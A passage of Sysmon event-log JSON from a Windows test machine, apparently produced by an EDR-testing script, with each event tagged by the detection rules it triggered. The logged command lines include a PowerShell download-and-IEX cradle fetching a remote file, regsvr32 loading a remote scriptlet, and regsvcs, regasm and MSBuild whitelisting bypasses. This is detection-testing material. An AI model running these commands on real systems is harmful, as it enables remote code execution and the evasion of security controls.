21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 